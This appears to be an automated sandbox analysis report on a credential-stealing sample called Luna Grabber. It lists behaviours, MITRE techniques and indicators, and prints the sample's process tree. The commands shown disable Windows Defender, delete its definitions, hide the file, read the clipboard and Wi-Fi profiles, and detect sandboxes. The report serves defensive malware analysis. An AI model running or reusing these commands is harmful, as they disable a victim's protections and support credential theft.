e1a5ef2777acf33ec21f7dc25bb4b1beec3b6f12752385b1d6d07d8ae917c078

Analysis

max time kernel
591s
max time network
558s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 09:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luna-Grabber-main/Builder.exe
Size

7.3MB
MD5

a215edd9d9788492b561858e44184bca
SHA1

77d8816ecce79f525c118687149e2f3b68dcb984
SHA256

7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184
SHA512

64dfdf28e74a95af3cef3ad89b45d656bb49fba705665aad7878a397f18ae1c1a7e1aca2df466e80179f130b5350f0ac1eea26affe940742c2c42b8930f035ff
SSDEEP

196608:uuWYS6uOshoKMuIkhVastRL5Di3uq1D7mW:IYShOshouIkPftRL54DRX

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4484	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1968	powershell.exe
3444	powershell.exe
2232	powershell.exe
3092	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1480	cmd.exe
3556	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4176	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe
1280	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
42	discord.com
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5032	tasklist.exe
4684	tasklist.exe
3816	tasklist.exe
2304	tasklist.exe
4136	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4420	cmd.exe

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00280000000450d0-21.dat	upx
behavioral2/memory/1280-25-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp	upx
behavioral2/files/0x00280000000450c3-27.dat	upx
behavioral2/memory/1280-30-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp	upx
behavioral2/files/0x00280000000450ce-29.dat	upx
behavioral2/memory/1280-32-0x00007FF9D8760000-0x00007FF9D876F000-memory.dmp	upx
behavioral2/files/0x00280000000450cf-35.dat	upx
behavioral2/files/0x00280000000450cd-34.dat	upx
behavioral2/files/0x00280000000450d4-39.dat	upx
behavioral2/files/0x00280000000450d3-38.dat	upx
behavioral2/files/0x00280000000450ca-48.dat	upx
behavioral2/files/0x00280000000450c9-47.dat	upx
behavioral2/files/0x00280000000450c8-46.dat	upx
behavioral2/files/0x00280000000450c7-45.dat	upx
behavioral2/files/0x00280000000450c6-44.dat	upx
behavioral2/files/0x00280000000450c5-43.dat	upx
behavioral2/files/0x00280000000450c4-42.dat	upx
behavioral2/files/0x00280000000450c2-41.dat	upx
behavioral2/files/0x00280000000450d5-40.dat	upx
behavioral2/memory/1280-54-0x00007FF9CF910000-0x00007FF9CF93D000-memory.dmp	upx
behavioral2/memory/1280-56-0x00007FF9D6B80000-0x00007FF9D6B99000-memory.dmp	upx
behavioral2/memory/1280-58-0x00007FF9CF8E0000-0x00007FF9CF903000-memory.dmp	upx
behavioral2/memory/1280-60-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp	upx
behavioral2/memory/1280-62-0x00007FF9CF8C0000-0x00007FF9CF8D9000-memory.dmp	upx
behavioral2/memory/1280-64-0x00007FF9CFEC0000-0x00007FF9CFECD000-memory.dmp	upx
behavioral2/memory/1280-66-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp	upx
behavioral2/memory/1280-68-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp	upx
behavioral2/memory/1280-71-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp	upx
behavioral2/memory/1280-70-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp	upx
behavioral2/memory/1280-72-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp	upx
behavioral2/memory/1280-78-0x00007FF9CFDF0000-0x00007FF9CFDFD000-memory.dmp	upx
behavioral2/memory/1280-81-0x00007FF9C0200000-0x00007FF9C031C000-memory.dmp	upx
behavioral2/memory/1280-80-0x00007FF9CF8E0000-0x00007FF9CF903000-memory.dmp	upx
behavioral2/memory/1280-76-0x00007FF9CF600000-0x00007FF9CF614000-memory.dmp	upx
behavioral2/memory/1280-102-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp	upx
behavioral2/memory/1280-109-0x00007FF9CF8C0000-0x00007FF9CF8D9000-memory.dmp	upx
behavioral2/memory/1280-110-0x00007FF9CFEC0000-0x00007FF9CFECD000-memory.dmp	upx
behavioral2/memory/1280-111-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp	upx
behavioral2/memory/1280-112-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp	upx
behavioral2/memory/1280-113-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp	upx
behavioral2/memory/1280-242-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp	upx
behavioral2/memory/1280-251-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp	upx
behavioral2/memory/1280-252-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp	upx
behavioral2/memory/1280-250-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp	upx
behavioral2/memory/1280-247-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp	upx
behavioral2/memory/1280-241-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp	upx
behavioral2/memory/1280-315-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp	TiWorker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1964	cmd.exe
3492	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4888	WMIC.exe
1632	WMIC.exe
3436	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4920	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
3092	powershell.exe
1968	powershell.exe
3016	WMIC.exe
3016	WMIC.exe
3016	WMIC.exe
3016	WMIC.exe
3092	powershell.exe
1968	powershell.exe
4888	WMIC.exe
4888	WMIC.exe
4888	WMIC.exe
4888	WMIC.exe
1632	WMIC.exe
1632	WMIC.exe
1632	WMIC.exe
1632	WMIC.exe
3112	WMIC.exe
3112	WMIC.exe
3112	WMIC.exe
3112	WMIC.exe
3556	powershell.exe
3556	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
3556	powershell.exe
3444	powershell.exe
3444	powershell.exe
5024	powershell.exe
5024	powershell.exe
904	WMIC.exe
904	WMIC.exe
904	WMIC.exe
904	WMIC.exe
4480	WMIC.exe
4480	WMIC.exe
4480	WMIC.exe
4480	WMIC.exe
2524	WMIC.exe
2524	WMIC.exe
2524	WMIC.exe
2524	WMIC.exe
2232	powershell.exe
2232	powershell.exe
3436	WMIC.exe
3436	WMIC.exe
3436	WMIC.exe
3436	WMIC.exe
2572	powershell.exe
2572	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3816	tasklist.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: 36	3016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: 36	3016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe
1212	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1212	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3536 wrote to memory of 1280	3536	Builder.exe	80
PID 3536 wrote to memory of 1280	3536	Builder.exe	80
PID 1280 wrote to memory of 3704	1280	Builder.exe	81
PID 1280 wrote to memory of 3704	1280	Builder.exe	81
PID 1280 wrote to memory of 3860	1280	Builder.exe	82
PID 1280 wrote to memory of 3860	1280	Builder.exe	82
PID 1280 wrote to memory of 1692	1280	Builder.exe	83
PID 1280 wrote to memory of 1692	1280	Builder.exe	83
PID 1280 wrote to memory of 4648	1280	Builder.exe	87
PID 1280 wrote to memory of 4648	1280	Builder.exe	87
PID 1280 wrote to memory of 2872	1280	Builder.exe	89
PID 1280 wrote to memory of 2872	1280	Builder.exe	89
PID 4648 wrote to memory of 3816	4648	cmd.exe	91
PID 4648 wrote to memory of 3816	4648	cmd.exe	91
PID 3704 wrote to memory of 3092	3704	cmd.exe	92
PID 3704 wrote to memory of 3092	3704	cmd.exe	92
PID 3860 wrote to memory of 1968	3860	cmd.exe	93
PID 3860 wrote to memory of 1968	3860	cmd.exe	93
PID 1692 wrote to memory of 4760	1692	cmd.exe	94
PID 1692 wrote to memory of 4760	1692	cmd.exe	94
PID 2872 wrote to memory of 3016	2872	cmd.exe	95
PID 2872 wrote to memory of 3016	2872	cmd.exe	95
PID 3860 wrote to memory of 4484	3860	cmd.exe	98
PID 3860 wrote to memory of 4484	3860	cmd.exe	98
PID 1280 wrote to memory of 4176	1280	Builder.exe	101
PID 1280 wrote to memory of 4176	1280	Builder.exe	101
PID 4176 wrote to memory of 1712	4176	cmd.exe	103
PID 4176 wrote to memory of 1712	4176	cmd.exe	103
PID 1280 wrote to memory of 3444	1280	Builder.exe	104
PID 1280 wrote to memory of 3444	1280	Builder.exe	104
PID 3444 wrote to memory of 5076	3444	cmd.exe	106
PID 3444 wrote to memory of 5076	3444	cmd.exe	106
PID 1280 wrote to memory of 1644	1280	Builder.exe	107
PID 1280 wrote to memory of 1644	1280	Builder.exe	107
PID 1644 wrote to memory of 4888	1644	cmd.exe	109
PID 1644 wrote to memory of 4888	1644	cmd.exe	109
PID 1280 wrote to memory of 2316	1280	Builder.exe	110
PID 1280 wrote to memory of 2316	1280	Builder.exe	110
PID 2316 wrote to memory of 1632	2316	cmd.exe	112
PID 2316 wrote to memory of 1632	2316	cmd.exe	112
PID 1280 wrote to memory of 4420	1280	Builder.exe	113
PID 1280 wrote to memory of 4420	1280	Builder.exe	113
PID 4420 wrote to memory of 648	4420	cmd.exe	115
PID 4420 wrote to memory of 648	4420	cmd.exe	115
PID 1280 wrote to memory of 4060	1280	Builder.exe	117
PID 1280 wrote to memory of 4060	1280	Builder.exe	117
PID 1280 wrote to memory of 3620	1280	Builder.exe	118
PID 1280 wrote to memory of 3620	1280	Builder.exe	118
PID 4060 wrote to memory of 4136	4060	cmd.exe	121
PID 4060 wrote to memory of 4136	4060	cmd.exe	121
PID 3620 wrote to memory of 2304	3620	cmd.exe	122
PID 3620 wrote to memory of 2304	3620	cmd.exe	122
PID 1280 wrote to memory of 1660	1280	Builder.exe	123
PID 1280 wrote to memory of 1660	1280	Builder.exe	123
PID 1280 wrote to memory of 1480	1280	Builder.exe	124
PID 1280 wrote to memory of 1480	1280	Builder.exe	124
PID 1280 wrote to memory of 4708	1280	Builder.exe	126
PID 1280 wrote to memory of 4708	1280	Builder.exe	126
PID 1280 wrote to memory of 1504	1280	Builder.exe	128
PID 1280 wrote to memory of 1504	1280	Builder.exe	128
PID 1280 wrote to memory of 1964	1280	Builder.exe	131
PID 1280 wrote to memory of 1964	1280	Builder.exe	131
PID 1280 wrote to memory of 4036	1280	Builder.exe	132
PID 1280 wrote to memory of 4036	1280	Builder.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3332	attrib.exe
4568	attrib.exe
648	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3536
- C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1968
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4420
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1660
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4708
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1504
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1964
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4036
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3156
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:464
- - C:\Windows\system32\cmd.exe
